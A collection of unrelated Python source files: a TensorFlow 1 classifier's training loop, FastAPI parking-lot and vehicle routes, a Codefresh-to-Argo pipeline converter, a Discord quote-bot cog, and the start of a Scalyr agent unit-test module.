    chunks ending strictly before len(samples) are produced; the trailing
    chunk is dropped, matching the fixed-size placeholders downstream.
    """
    if len(samples) != len(labels):
        raise Exception('Length of samples and labels must equal')
    total = len(samples)
    start = 0
    batch_index = 0
    while start < total:
        end = start + chunkSize
        if end < total:
            yield batch_index, samples[start:end], labels[start:end]
            batch_index += 1
        start = end
class Network():
    """One-hidden-layer fully-connected classifier built on TF1 graphs."""

    def __init__(self, num_hidden, batch_size):
        """
        @num_hidden: number of nodes in the hidden layer
        @batch_size: data is processed in batches of this size to save memory
        """
        self.batch_size = batch_size
        self.test_batch_size = 500
        # Hyper Parameters
        self.num_hidden = num_hidden
        # Graph Related
        self.graph = tf.Graph()
        self.tf_train_samples = None
        self.tf_train_labels = None
        self.tf_test_samples = None
        self.tf_test_labels = None
        self.tf_test_prediction = None

    def define_graph(self):
        """
        Define the computation graph.
        """
        with self.graph.as_default():
            # Only the graph's variables/placeholders are declared here.
            self.tf_train_samples = tf.placeholder(
                tf.float32, shape=(self.batch_size, image_size, image_size, num_channels)
            )
            self.tf_train_labels = tf.placeholder(
                tf.float32, shape=(self.batch_size, num_labels)
            )
            self.tf_test_samples = tf.placeholder(
                tf.float32, shape=(self.test_batch_size, image_size, image_size, num_channels)
            )
            # fully connected layer 1, fully connected
            fc1_weights = tf.Variable(
                tf.truncated_normal([image_size * image_size * num_channels, self.num_hidden], stddev=0.1)
            )
            fc1_biases = tf.Variable(tf.constant(0.1, shape=[self.num_hidden]))
            # fully connected layer 2 --> output layer
            fc2_weights = tf.Variable(
                tf.truncated_normal([self.num_hidden, num_labels], stddev=0.1)
            )
            fc2_biases = tf.Variable(tf.constant(0.1, shape=[num_labels]))

            # Now define the graph's operations.
            def model(data):
                # fully connected layer 1
                shape = data.get_shape().as_list()
                print(data.get_shape(), shape)
                # Flatten (batch, h, w, c) -> (batch, h*w*c) for the dense layer.
                reshape = tf.reshape(data, [shape[0], shape[1] * shape[2] * shape[3]])
                print(reshape.get_shape(), fc1_weights.get_shape(), fc1_biases.get_shape())
                hidden = tf.nn.relu(tf.matmul(reshape, fc1_weights) + fc1_biases)
                # fully connected layer 2
                return tf.matmul(hidden, fc2_weights) + fc2_biases

            # Training computation.
            logits = model(self.tf_train_samples)
            self.loss = tf.reduce_mean(
                tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=self.tf_train_labels)
            )
            # print(self.loss)
            # Optimizer.
            self.optimizer = tf.train.GradientDescentOptimizer(0.01).minimize(self.loss)
            # Predictions for the training, validation, and test data.
            self.train_prediction = tf.nn.softmax(logits)
            self.test_prediction = tf.nn.softmax(model(self.tf_test_samples))

    def run(self):
        """
        Run training then testing inside a Session.
        """
        # private function
        def print_confusion_matrix(confusionMatrix):
            print('Confusion Matrix:')
            for i, line in enumerate(confusionMatrix):
                # Per-class recall: correct predictions over true instances.
                print(line, line[i] / np.sum(line))
            a = 0
            for i, column in enumerate(np.transpose(confusionMatrix, (1, 0))):
                # Per-class precision weighted by predicted-class frequency.
                # NOTE(review): 26000 is presumably the test-set size — confirm.
                a += (column[i] / np.sum(column)) * (np.sum(column) / 26000)
                print(column[i] / np.sum(column), )
            print('\n', np.sum(confusionMatrix), a)

        self.session = tf.Session(graph=self.graph)
        with self.session as session:
            tf.global_variables_initializer().run()

            ### Training
            print('Start Training')
            # batch 1000
            for i, samples, labels in get_chunk(train_samples, train_labels, chunkSize=self.batch_size):
                _, l, predictions = session.run(
                    [self.optimizer, self.loss, self.train_prediction],
                    feed_dict={self.tf_train_samples: samples, self.tf_train_labels: labels}
                )
                print("loss is :", l)
                # labels is True Labels
                accuracy, _ = self.accuracy(predictions, labels)
                if i % 50 == 0:
                    print('Minibatch loss at step %d: %f' % (i, l))
                    print('Minibatch accuracy: %.1f%%' % accuracy)
            ###

            ### Testing
            print('Start Testing')
            accuracies = []
            confusionMatrices = []
            for i, samples, labels in get_chunk(test_samples, test_labels, chunkSize=self.test_batch_size):
                result = self.test_prediction.eval(feed_dict={self.tf_test_samples: samples})
                accuracy, cm = self.accuracy(result, labels, need_confusion_matrix=True)
                accuracies.append(accuracy)
                confusionMatrices.append(cm)
                print('Test Accuracy: %.1f%%' % accuracy)
            print(' Average Accuracy:', np.average(accuracies))
            print('Standard Deviation:', np.std(accuracies))
            print_confusion_matrix(np.add.reduce(confusionMatrices))
            ###

    def accuracy(self, predictions, labels, need_confusion_matrix=False):
        """
        Compute prediction accuracy (and, optionally, the confusion matrix).
        @return: accuracy and confusionMatrix as a tuple
        """
        _predictions = np.argmax(predictions, 1)
        _labels = np.argmax(labels, 1)
        cm = confusion_matrix(_labels, _predictions) if need_confusion_matrix else None
        # == is overloaded for numpy array
        accuracy = (100.0 * np.sum(_predictions == _labels) / predictions.shape[0])
        return accuracy, cm
if __name__ == '__main__':
    # Train and evaluate a one-hidden-layer network on the loaded dataset.
    net = Network(num_hidden=128, batch_size=100)
    net.define_graph()
    net.run()
|
<filename>backend/parky/routes.py
from datetime import datetime
from typing import Optional
from fastapi import Depends, Header, HTTPException, Response
from pydantic import BaseModel
from sqlalchemy.orm import Session
from parky.database import ParkingLot, User, get_db
from parky.services import ParkingLotService, UserService, V2DRelayService, VehicleService
from parky.utils import get_logger
logger = get_logger("RouteHandler")
# Middleware Utils
def _auth_check(authorization: str) -> Optional[str]:
    """
    Check authorization header and retrieve session data.

    :param authorization: HTTP ``Authorization`` header
    :returns: User ID if succeed, else None

    .. note::
        ``Authorization:`` header should be Bearer form:

        * ``Authorization: Bearer TOKENTOKENTOKEN``
    """
    # Robustness: a missing or malformed header previously crashed the
    # tuple unpack; treat it as an authentication failure instead.
    parts = authorization.strip().split(" ") if authorization else []
    if len(parts) != 2:
        logger.error("Authorization header is missing or malformed")
        return None
    method, token = parts
    if method != "Bearer":
        logger.error("Authorization method is not Bearer")
        return None
    user_service = UserService.instance()
    try:
        result = user_service.check_session(token)
    except Exception:
        # Bug fix: the original raised ValueError here, making its
        # 'return None' unreachable and breaking the documented
        # None-on-failure contract that callers rely on for 401s.
        logger.error("Failed to retrieve user information")
        return None
    return result
# Handlers
async def handle_status():
    """Liveness endpoint: reports service status plus the current time."""
    payload = {"status": "OK"}
    payload["timestamp"] = datetime.now()
    return payload
class SignupRequest(BaseModel):
    """Request body for the signup endpoint."""
    name: str
    ssn: str
    user_id: str
    password: str
    public_key: str
async def handle_signup(signup_request: SignupRequest, db: Session = Depends(get_db)):
    """Register a new user; 500 when the user_id is already taken.

    :param signup_request: validated signup payload
    :param db: injected database session
    """
    response = UserService.add_user(
        db=db,
        name=signup_request.name,
        ssn=signup_request.ssn,
        user_id=signup_request.user_id,
        # Bug fix: the password argument held an invalid '<PASSWORD>'
        # placeholder token; pass the request's password through.
        password=signup_request.password,
        public_key=signup_request.public_key,
    )
    if not response:
        # NOTE: 409 Conflict would be more conventional for a duplicate id,
        # but the existing status code is preserved for API compatibility.
        raise HTTPException(status_code=500, detail=f"Already used user_id {signup_request.user_id}")
    return {"message": f"User {signup_request.user_id} is signed up."}
class SigninRequest(BaseModel):
    """Request body for the signin endpoint."""
    user_id: str
    password: str
async def handle_signin(signin_request: SigninRequest, db: Session = Depends(get_db)):
    """Authenticate a user and return a session token; 401 on failure."""
    service = UserService.instance()
    try:
        session_token = await service.signin(
            db=db,
            user_id=signin_request.user_id,
            password=signin_request.password,
        )
    except ValueError:
        raise HTTPException(status_code=401, detail=f"not existed user {signin_request.user_id} tried to sign in.")
    return {"status": True, "token": session_token}
async def handle_get_vehicles(response: Response, authorization: str = Header(None)):
    """List every registered vehicle; 404 payload when none exist."""
    if _auth_check(authorization) is None:
        raise HTTPException(status_code=401, detail="Not authorized")
    vehicles = VehicleService.instance().get_vehicles()
    if vehicles is None or len(vehicles) == 0:
        response.status_code = 404
        return {"reason": "No vehicle was registered"}
    return vehicles
async def handle_find_vehicle(response: Response, number: str, authorization: str = Header(None)):
    """Look up a single vehicle by its number; 404 payload when absent."""
    if _auth_check(authorization) is None:
        raise HTTPException(status_code=401, detail="Not authorized")
    vehicle = VehicleService.instance().find_vehicle_by_number(number)
    if vehicle is None:
        response.status_code = 404
        return {"reason": "Requested vehicle is not found"}
    return vehicle
class RegisterVehicleRequest(BaseModel):
    """Request body for the vehicle registration endpoint."""
    number: str
    public_key: str
    signature: str
async def handle_register_vehicle(data: RegisterVehicleRequest, response: Response):
    """Register a vehicle; non-zero service status maps to HTTP 400."""
    service = VehicleService.instance()
    status = service.register_vehicle(data.number, data.public_key, data.signature)
    if status != 0:
        response.status_code = 400
        return {"reason": "Registering vehicle is failed"}
    response.status_code = 200
    return {"ok": True}
async def handle_start_session(uid: str, vid: str):
    """Open a V2D relay session between a user and a vehicle."""
    relay = V2DRelayService()
    try:
        token, public_key = relay.start_session(uid, vid)
    except ValueError:
        raise HTTPException(status_code=404, detail="Vehicle not found by given ids")
    return {"token": token, "public_key": public_key}
class AuthVehicleRequest(BaseModel):
    # Request body for vehicle-side relay authentication.
    vid: str
    token: str
async def handle_auth_vehicle(data: AuthVehicleRequest):
    """Authenticate the vehicle side of an open relay session."""
    relay = V2DRelayService()
    try:
        token, public_key = relay.auth_vehicle(data.vid, data.token)
    except ValueError:
        raise HTTPException(status_code=404, detail="Vehicle not found by given ids")
    return {"token": token, "public_key": public_key}
class AuthClientRequest(BaseModel):
    # Request body for client-side relay authentication.
    uid: str
    token: str
async def handle_auth_client(data: AuthClientRequest):
    """Authenticate the client side of an open relay session."""
    relay = V2DRelayService()
    try:
        relay.auth_client(data.uid, data.token)
    except ValueError:
        raise HTTPException(status_code=404, detail="Vehicle not found by given ids")
    return {"status": True}
async def handle_get_all_parking_lot(db: Session = Depends(get_db)):
    """List every parking lot."""
    return {"parking_lots": ParkingLotService.get_all_lots(db)}
async def handle_income_car(parking_id: int, vehicle_number: str, db: Session = Depends(get_db)):
    """Record a vehicle entering a lot; returns its assigned spot number."""
    spot = ParkingLotService().income_car(db, parking_id, vehicle_number)
    return {"parking_number": spot}
async def handle_go_out_car(vehicle_number: str, db: Session = Depends(get_db)):
    """Record a vehicle leaving; 404 when the vehicle is unknown (status 0)."""
    if ParkingLotService().go_out_car(db, vehicle_number) == 0:
        raise HTTPException(status_code=404, detail="Vehicle not found by given ids")
    return {"status": True}
async def handle_reserve(parking_id: int, user_id: str, db: Session = Depends(get_db)):
    """Reserve a spot in a lot for a user; 404 when already reserved (status 0)."""
    if ParkingLotService().reserve(db, parking_id, user_id) == 0:
        raise HTTPException(status_code=404, detail="already reserved user")
    return {"status": True}
|
#!/usr/bin/env python3
### IMPORTS ###
import logging
import uuid
import os
import sys
from string import Template
import yaml
from classic import StepTypeNotSupported
from .eventsource import EventSource
from .sensor import Sensor
from .ingress import Ingress
from .workflow_template import WorkflowTemplate
### GLOBALS ###
### FUNCTIONS ###
def convert_condition_into_depends_string(cond):
    '''Transform the string for the when V1 clause into a V2 depends step.state

    Maps a V1 condition state onto the matching V2 task-result names and
    renders an " && (<step>.<Result>|| ...)" clause to append to a task's
    depends expression.

    :param cond: condition object exposing .state and .step_name
    :return: the depends clause string
    :raises KeyError: when cond.state is not one of the known states
    '''
    condition_conversion = {
        "success": ["Succeeded"],
        "failure": ["Errored"],
        "finished": ["Succeeded", "Errored"],
        "skipped": ["Skipped"]
    }
    # "|| " is the same separator the old manual loop produced (no space
    # before the ||); the loop also shadowed the builtin name `str`.
    clause = "|| ".join(
        '%s.%s' % (cond.step_name, state)
        for state in condition_conversion[cond.state]
    )
    return " && (" + clause + ")"
def create_plugin_task_block(plugin, previous):
    '''Create a block of Yaml in a dag to call a plugin

    :param plugin: V1 plugin step exposing .name, .fail_fast, .plugin_name,
        .plugin_version, .parameters (objects with .name/.value) and
        .conditions (possibly empty)
    :param previous: depends expression from the previous step, or None/''
        when this is the first task
    :return: dict ready to append to the workflow template dag tasks
    '''
    logging.info("Create workflow template block for %s", plugin.name)
    block = {
        "name": plugin.name,
        # continueOn.failed is the inverse of the V1 fail_fast flag.
        "continueOn": {"failed": not bool(plugin.fail_fast)},
        "templateRef": {
            "name": f"c2csdp.{plugin.plugin_name}.{plugin.plugin_version}",
            "template": plugin.plugin_name
        },
        "arguments": {
            "parameters": [
                {"name": p.name, "value": p.value} for p in plugin.parameters
            ]
        }
    }
    if previous:
        block['depends'] = previous
    if plugin.conditions:
        logging.debug("Processing conditions")
        # Bug fix: the old code did block['depends'] += ... which raised
        # KeyError for a plugin with conditions but no previous step;
        # start from an empty depends string in that case.
        depends = block.get('depends', '')
        for cond in plugin.conditions:
            depends += convert_condition_into_depends_string(cond)
        block['depends'] = depends
    else:
        logging.debug("NO conditions")
    return block
### CLASSES ###
class Csdp:
    """Class related to Codefresh Classic operations and data

    Holds the four generated CSDP manifests (event source, sensor, workflow
    template, ingress) for one converted V1 pipeline and provides the
    conversion entry points (triggers, steps, variables, volumes).
    """
    def __init__(self, v1, ingress_url, volume_size):
        # v1: parsed Classic (V1) pipeline; must expose .project and .name
        # (both validated by the property setters below).
        self.logger = logging.getLogger(type(self).__name__)
        # One uuid per conversion run; ties the event source, sensor and
        # webhook ingress path together.
        self.uuid=str(uuid.uuid1())
        self.ingress_url=ingress_url
        self.project = v1.project
        self.name = v1.name
        self.volume_size = volume_size
        self.event_source = EventSource(name=v1.name, project=v1.project,
            provider="github", uuid=self.uuid)
        self.sensor = Sensor(v1.project, v1.name, "github", self.uuid, self.volume_size)
        self.workflow_template = WorkflowTemplate(v1.project, v1.name)
        self.ingress = Ingress(v1.project)
    def save(self):
        '''Save the whole CSDP object to disk in the project folder'''
        os.makedirs(self.project, exist_ok=True)
        self.event_source.save(self.project, self.name)
        self.sensor.save(self.project, self.name)
        self.workflow_template.save(self.project, self.name)
        self.ingress.save(self.project)
    def convert_trigger(self, trig):
        '''convert the trigger and add it to the EventSource block

        Renders the event template with the trigger's repo/event data, adds
        it under spec.<provider> of the event source, and registers the
        matching webhook path on the ingress.
        '''
        # trig.repo is expected as "owner/repo_name".
        (owner,repo_name) = trig.repo.split('/')
        self.logger.info("Convert Trigger %s", self.name)
        yaml_filename = "./manifests/eventBlock.template.yaml"
        with open(yaml_filename, mode='r', encoding='UTF-8') as file:
            contents = file.read()
        template = Template(contents)
        values = {
            'event': trig.events,
            'owner': owner,
            'repo_name': repo_name,
            'name': self.name,
            'project': self.project,
            'provider': trig.provider,
            'uuid': self.uuid,
            'ingress_url': self.ingress_url
        }
        event_yaml=template.substitute(values)
        self.event_source.manifest['spec'][trig.provider]=yaml.safe_load(event_yaml)
        # Route the provider webhook through the ingress to the event
        # source's service.
        block = {
            "path": f"/webhooks/{self.project}/{self.name}/{trig.provider}-{self.uuid}",
            "backend": {
                "service": {
                    "name": f"{self.name}-eventsource-svc",
                    "port": {
                        "number": 80
                    }
                }
            },
            "pathType": "ImplementationSpecific"
        }
        self.ingress.manifest['spec']['rules'][0]['http']['paths'].append(block)
    #
    # Step is converted into:
    #    - a template in the workflow template
    #    - a call in the "pipeline" workflow
    def convert_step(self, step, previous_step = None):
        '''Convert a V1 step into a task

        :param step: V1 step object; only type "plugins" is supported
        :param previous_step: depends expression of the preceding task
        :raises StepTypeNotSupported: for any other step type
        '''
        self.logger.info("Converting step %s (%s)", step.name, step.type)
        if step.type == "plugins":
            template_block=create_plugin_task_block(step, previous_step)
            self.workflow_template.manifest['spec']['templates'][0]['dag']['tasks'].append(template_block)
        else:
            raise StepTypeNotSupported(step.type)
    def convert_variable(self, var, provider, uuid):
        '''Variable is added to the sensor (input to argoWorkflow)
           parameters (match payload to input param)
        '''
        # Every variable becomes a workflow argument on the sensor trigger.
        self.sensor.manifest['spec']['triggers'][0]['template']['argoWorkflow']['source']['resource']['spec']['arguments']['parameters'].append(
            {"name": var.name, "value": var.value}
        )
        if var.source == 'pipeline':
            # Pipeline-level variables carry a default value.
            self.workflow_template.manifest['spec']['templates'][0]['inputs']['parameters'].append(
                {"name": var.name, "value": var.value}
            )
        else:
            # Trigger-provided variables: value is mapped from the event
            # payload via a dataTemplate parameter below.
            self.workflow_template.manifest['spec']['templates'][0]['inputs']['parameters'].append(
                {"name": var.name}
            )
            self.sensor.manifest['spec']['triggers'][0]['template']['argoWorkflow']['parameters'].append(
                {
                    "dest": f"spec.arguments.parameters.{var.order}.value",
                    "src": {
                        "dependencyName": f"{provider}-{uuid}",
                        "dataTemplate": var.path
                    }
                }
            )
    #
    # Add secret volumes to workflow template
    # Like in case of kaniko build for example
    def add_secret_volume(self, volume):
        'Add mount for secret volume - aka docker secrets for kaniko'
        # Mounts the secret's .dockerconfigjson as config.json, the layout
        # kaniko expects for registry credentials.
        self.workflow_template.manifest['spec']['volumes'].append(
            {
                "name": volume,
                "secret": {
                    "secretName": volume,
                    "items": [
                        {
                            "key": ".dockerconfigjson",
                            "path": "config.json"
                        }
                    ]
                }
            }
        )
    ### Setters and getters
    @property
    def workflow_template(self):
        return self._workflowTemplate
    @workflow_template.setter
    def workflow_template(self, value):
        # Guard against wiring in a manifest of the wrong kind.
        if not value.manifest['kind'] == "WorkflowTemplate":
            self.logger.error("This is not a workflowTemplate")
            raise TypeError
        self._workflowTemplate=value
    @property
    def sensor(self):
        return self._sensor
    @sensor.setter
    def sensor(self, value):
        if not value.manifest['kind'] == "Sensor":
            self.logger.error("This is not a sensor")
            raise TypeError
        self._sensor=value
    @property
    def ingress(self):
        return self._ingress
    @ingress.setter
    def ingress(self, value):
        if not value.manifest['kind'] == "Ingress":
            self.logger.error("This is not a ingress")
            raise TypeError
        self._ingress=value
    @property
    def event_source(self):
        return self._eventSource
    @event_source.setter
    def event_source(self, value):
        if not value.manifest['kind'] == "EventSource":
            self.logger.error("This is not an event source")
            raise TypeError
        self._eventSource=value
    @property
    def ingress_url(self):
        '''Return Ingress URL'''
        return self._ingress_url
    @ingress_url.setter
    def ingress_url(self, value):
        if not isinstance(value, str):
            raise TypeError
        # Non-https URLs are accepted but warned about.
        # NOTE(review): "shold" is a typo in the warning message text.
        if not value.startswith("https://"):
            self.logger.warning("Ingress url shold start with https://")
        self._ingress_url = value
    @property
    def project(self):
        return self._project
    @project.setter
    def project(self, value):
        # Project names must be strings of at least 3 characters.
        if not isinstance(value, str):
            raise TypeError
        if len(value) < 3:
            raise ValueError
        self._project = value
    @property
    def name(self):
        return self._name
    @name.setter
    def name(self, value):
        # Pipeline names must be strings of at least 3 characters.
        if not isinstance(value, str):
            raise TypeError
        if len(value) < 3:
            raise ValueError
        self._name = value
    @property
    def volume_size(self):
        return self._volume_size
    @volume_size.setter
    def volume_size(self, value):
        if not isinstance(value, int):
            raise TypeError
        self._volume_size = value
    @property
    def uuid(self):
        return self._uuid
    @uuid.setter
    def uuid(self, value):
        self._uuid = value
|
import discord
from discord.ext import commands
from discord_slash import cog_ext, SlashContext
import GlobalData
import random
import StringUtils
from LogData import LogAddedQuote
from Aliases import GetAlias
# Initialize the shared module-level quote/tag/speaker containers before any
# command handlers run.
GlobalData.init()
class Quote():
    """A single quote: who said it, the text, and its search tags."""
    def __init__( self, speaker, text, tags ):
        self.speaker = speaker
        self.text = text
        self.tags = tags
    def __repr__( self ):
        # Rendered as: Speaker: "text" [tags]
        return f'{self.speaker}: "{self.text}" {self.tags}'
    def __str__( self ):
        return f'{self.speaker}: "{self.text}" {self.tags}'
    def AddTag( self, tag ):
        """Append one tag to this quote's tag list."""
        self.tags.append( tag )
def ParseQuotesTxT():
    """Parse Quotes.txt and rebuild every in-memory quote data structure."""
    with open( 'Quotes.txt', encoding = "utf-8" ) as f:
        print( "" )
        print( "Began parsing quote book" )
        # Reset all global containers before repopulating them.
        for container in ( GlobalData.quoteList, GlobalData.tagDict,
                           GlobalData.speakerDict, GlobalData.sortedSpeakerList ):
            container.clear()
        current_speaker = ''
        for raw_line in f:
            if raw_line.startswith('~'):
                # '~Name:' lines switch the active speaker.
                current_speaker = ExtractSpeaker( raw_line )
            elif raw_line.startswith('"'):
                # '"..."' lines are quotes attributed to the active speaker.
                new_quote = Quote( current_speaker, ExtractQuote( raw_line ), ExtractTags( raw_line ) )
                AddQuoteToQuoteList( new_quote )
                AddQuoteToTagDict( new_quote )
                # Defer leaderboard sorting until every quote is loaded.
                AddQuoteToSpeakerData( new_quote, sortSpeakerList = False )
        SortSpeakerList()
        print( "Finished parsing quote book" )
        print( str( len( GlobalData.quoteList ) ) + " quotes parsed")
        print( str( len( GlobalData.tagDict.keys() ) ) + " tags made" )
        CalculateSingleQuoteTags()
def AddQuoteToQuoteList( quote ):
    # Append the quote to the global flat list of all quotes.
    GlobalData.quoteList.append( quote )
def AddQuoteToTagDict( quote ):
    """Index the quote under each of its tags in GlobalData.tagDict."""
    for tag in quote.tags:
        # setdefault creates the list on first sight of a tag, then appends.
        GlobalData.tagDict.setdefault( tag, [] ).append( quote )
def AddQuoteToSpeakerData( quote, sortSpeakerList : bool = True ):
    """Index the quote by speaker and (optionally) re-sort the leaderboard."""
    existing = GlobalData.speakerDict.get( quote.speaker )
    if existing is None:
        # First quote for this speaker: the same list object goes into both
        # the dict and the leaderboard so they stay in sync.
        quotes = [ quote ]
        GlobalData.speakerDict[ quote.speaker ] = quotes
        GlobalData.sortedSpeakerList.append( ( quote.speaker, quotes ) )
    else:
        existing.append( quote )
    if sortSpeakerList:
        SortSpeakerList()
def SortSpeakerList():
    # Sort the leaderboard by quote count, most-quoted speaker first.
    GlobalData.sortedSpeakerList.sort( key = lambda x: len( x[1] ), reverse = True )
# Assumptions made:
# There will always be a blank line at the start of the quote book
# There will always be a blank line between speaker blocks
def AddQuoteToQuoteBook( speaker, text, additionalTags ):
    """Insert a quote into Quotes.txt, keeping speaker blocks alphabetized.

    :param speaker: canonical (already aliased) speaker name
    :param text: quote text without surrounding quotation marks
    :param additionalTags: extra tag words appended after the quote, or ''
    """
    with open( 'Quotes.txt', 'r+', encoding = "utf-8" ) as f:
        contents = f.readlines()
        insertLineIndex = None
        makeNewSpeaker = True
        for index, line in enumerate( contents ):
            if line.startswith('~'):
                currSpeaker = ExtractSpeaker( line )
                if speaker.lower() == currSpeaker.lower():
                    makeNewSpeaker = False
                elif speaker.lower() < currSpeaker.lower():
                    # Insert on the blank line just before this speaker's
                    # block (see the assumptions above).
                    insertLineIndex = index - 1
                    break
        message = ""
        if makeNewSpeaker:
            message = "\n~" + speaker + ":\n"
        message += '"' + text + '"'
        if additionalTags:
            message += " " + additionalTags
        message += "\n"
        # Bug fix: compare with None by identity ("is not"), not "!=".
        if insertLineIndex is not None:
            contents.insert( insertLineIndex, message )
        else:
            contents.append( message )
        # Rewrite from the start; the content only ever grows here, so the
        # old bytes are fully overwritten and no truncate() is needed.
        f.seek(0)
        f.writelines( contents )
def CalculateSingleQuoteTags():
    """Report tags that are associated with exactly one quote.

    Prints the count of single-quote tags and a random sample of up to
    three of them. Previously random.sample(..., 3) raised ValueError when
    fewer than three such tags existed.
    """
    tagsWithOneQuote = [
        ( tag, str( quotes[0] ) )
        for tag, quotes in GlobalData.tagDict.items()
        if len( quotes ) == 1
    ]
    print("")
    print( str( len( tagsWithOneQuote ) ) + " tags have only one quote" )
    # Bug fix: sample at most 3 so a small quote book cannot crash this.
    chosenTags = random.sample( tagsWithOneQuote, min( 3, len( tagsWithOneQuote ) ) )
    print( "Randomly chosen one tag quotes:")
    for tag in chosenTags:
        print( tag[0] + " - " + str( tag[1] ) )
# Formatted with a ~ at the beginning and a : at the end
# ~Speaker:
def ExtractSpeaker( line ):
    """Return the speaker name between the leading '~' and the last ':'."""
    begin = line.find("~") + 1
    return line[begin:line.rindex(":")]
# Quotes are formatted between two quotation marks
# Additional tags can be placed at the end to give the quote additional context
# "This is a quote" And these are more tags
def ExtractTags( line ):
    """Tokenize the line into tag words, dropping common words and suffixes."""
    words = StringUtils.StandardizeString( line ).split()
    return StringUtils.RemoveSuffixes( StringUtils.CutCommonWords( words ) )
def ExtractQuote( line ):
    """Return the text between the first and last double quote of the line."""
    first_mark = line.find('"') + 1
    return line[first_mark:line.rindex('"')]
class ParseQuotesCog( commands.Cog ):
    """Slash commands for reloading, adding, and relaying quotes."""
    def __init__( self, bot ):
        self.bot = bot
    @cog_ext.cog_slash( name = "reloadquotes", guild_ids = GlobalData.guildIDList )
    async def _reloadquotes( self, ctx: SlashContext ):
        # Re-parse Quotes.txt from disk; restricted to authorized users.
        await ctx.defer()
        if ctx.author_id not in GlobalData.guildData[ ctx.guild_id ][ 'authorizedUsers' ]:
            await ctx.send( "You are not authorized to use this command" )
            return
        print("\nReloading quotes")
        ParseQuotesTxT()
        await ctx.send( "Reloading quotes!" )
    @cog_ext.cog_slash( name = "addquote", guild_ids = GlobalData.guildIDList )
    async def _addquote( self, ctx: SlashContext, speaker : str, text : str, tags : str = "" ):
        # Add a quote to the in-memory structures and to Quotes.txt, then
        # report any leaderboard movement for the speaker.
        aliasedSpeaker = GetAlias( speaker )
        addNewSpeaker = False
        previousLeaderboardIndex = -1
        if aliasedSpeaker in GlobalData.speakerDict.keys():
            # Check if the quote is already in the quote book
            for quote in GlobalData.speakerDict[ aliasedSpeaker ]:
                if text.lower() == quote.text.lower():
                    await ctx.send( "That quote is already in the quote book!")
                    return
            # Find the current leaderboard index
            # NOTE(review): the loop variable below shadows the `speaker`
            # parameter; harmless today since only aliasedSpeaker is used
            # afterwards, but worth renaming.
            for index, speaker in enumerate( GlobalData.sortedSpeakerList ):
                if speaker[0] == aliasedSpeaker:
                    previousLeaderboardIndex = index
                    break
            if previousLeaderboardIndex == -1:
                print( "ERROR! somehow could not find " + aliasedSpeaker + " inside the leaderboard when /addquote")
        # The speaker we want to add does not exist in the quote book
        else:
            addNewSpeaker = True
        # Construct the quote object
        extractedTags = ExtractTags( text ) + ExtractTags( tags )
        quote = Quote( aliasedSpeaker, text, extractedTags )
        await ctx.defer()
        print( "\n" + ctx.author.name + " Wanted to add " + str( quote ) )
        # Add the quote object to the internal data structures
        AddQuoteToQuoteList( quote )
        AddQuoteToTagDict( quote )
        AddQuoteToSpeakerData( quote )
        AddQuoteToQuoteBook( aliasedSpeaker, text, tags )
        LogAddedQuote( quote, ctx.author.name )
        # Find the current leaderboard index
        currLeaderboardIndex = -1
        for index, speaker in enumerate( GlobalData.sortedSpeakerList ):
            if speaker[0] == aliasedSpeaker:
                currLeaderboardIndex = index
                break
        if currLeaderboardIndex == -1:
            print( "ERROR! somehow could not find " + aliasedSpeaker + " inside the leaderboard when /addquote")
        message = "Successfully added " + str( quote ) + "\n"
        if addNewSpeaker:
            message += "Added a new speaker: " + aliasedSpeaker
        else:
            # Celebrate when the speaker climbed the leaderboard.
            if currLeaderboardIndex < previousLeaderboardIndex:
                message += ":tada: " + aliasedSpeaker + " moved up to " + str( currLeaderboardIndex + 1 ) + " position! :tada:"
        await ctx.send( message )
    @cog_ext.cog_slash( name = "say", guild_ids = GlobalData.guildIDList )
    async def _say( self, ctx: SlashContext, text : str, channel ):
        # Relay *text* into the given channel; authorized users only.
        # NOTE(review): `channel` is presumably a channel id accepted by
        # bot.get_channel -- confirm against the slash-command definition.
        await ctx.defer()
        if ctx.author_id not in GlobalData.guildData[ ctx.guild_id ][ 'authorizedUsers' ]:
            await ctx.send( "You are not authorized to use this command" )
            return
        await GlobalData.bot.get_channel( channel ).send( text )
        await ctx.send( "Message sent!" )
def setup(bot):
    """Standard discord.py extension entry point: register the cog."""
    # Bug fix: removed a stray trailing "|" character that made the module
    # unparseable.
    bot.add_cog( ParseQuotesCog(bot) )
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: <NAME> <<EMAIL>>
#
# These are the same tests as in the previous copying manager, but adapted to the new copying manager.
#
from __future__ import unicode_literals
from __future__ import absolute_import
from io import open
__author__ = "<EMAIL>"
import sys
import logging
import platform
import os
import re
import pytest
# Send all DEBUG-level logging to stdout so test output captures it.
root = logging.getLogger()
root.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
ch.setFormatter(formatter)
root.addHandler(ch)
from scalyr_agent import scalyr_init
from scalyr_agent import util as scalyr_util
# scalyr_init must run before the remaining scalyr_agent imports.
scalyr_init()
from scalyr_agent import scalyr_logging
from tests.unit.copying_manager_tests.copying_manager_new_test import CopyingManagerTest
# Crank the agent logger to its most verbose level for the tests.
log = scalyr_logging.getLogger(__name__)
log.setLevel(scalyr_logging.DEBUG_LEVEL_5)
import six
def pytest_generate_tests(metafunc):
    """
    Run all tests for each configuration.
    """
    if "worker_type" not in metafunc.fixturenames:
        return
    # Thread-based worker sessions are always exercised.
    test_params = [["thread", 1, 1], ["thread", 2, 2]]
    # Multiprocess workers are additionally exercised everywhere except
    # Windows (and only on Python >= 2.7).
    if platform.system() != "Windows" and sys.version_info >= (2, 7):
        test_params += [["process", 1, 1], ["process", 2, 2]]
    metafunc.parametrize(
        "worker_type, workers_count, worker_sessions_count", test_params
    )
def _add_non_utf8_to_checkpoint_file(path):
    """
    Add a unicode character to the checkpoint data stored in file located in "path"
    """
    # Bug fix: use context managers so the handles are closed even when
    # decoding/encoding raises (previously open()/close() pairs could leak).
    with open(path, "r") as fp:
        data = scalyr_util.json_decode(fp.read())
    # 2-> TODO json libraries do not allow serialize bytes string with invalid UTF-8(ujson)or even bytes in general(json).
    # so to test this case we must write non-utf8 byte directly, without serializing.
